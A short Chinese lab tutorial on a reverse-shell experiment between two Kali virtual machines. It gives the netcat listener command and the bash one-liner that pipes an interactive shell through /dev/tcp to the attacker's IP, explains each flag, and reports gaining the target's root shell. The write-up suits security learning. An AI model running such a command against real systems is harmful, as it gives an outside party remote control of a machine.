反弹shell实验
攻击机kali2019:192.168.216.141
靶机kali2020:192.168.216.152
攻击机kali2019监听6767端口
nc -lvp 6767
-l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。
**bash -i >& /dev/tcp/192.168.216.141/6767 0>&1**
-i interactive。即产生一个交互式的shell(bash)
&>或>& 表示混合输出,即标准输出1 + 错误输出2)
/dev/tcp/IP/PORT 是特殊的设备文件,实际这个文件并不存在,它只是base实现网络请求的一个接口打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
套接字(Socket),就是对网络中不同主机上的应用进程之间进行双向通信的端点的抽象
。
攻击机kali2019成功连接,此时已变成靶机kali2020的界面
我们可以在攻击机使用一些命令(此时回显的内容为靶机kali2020的root文件)
参考文档:https://www.cnblogs.com/iouwenbo/p/11277453.html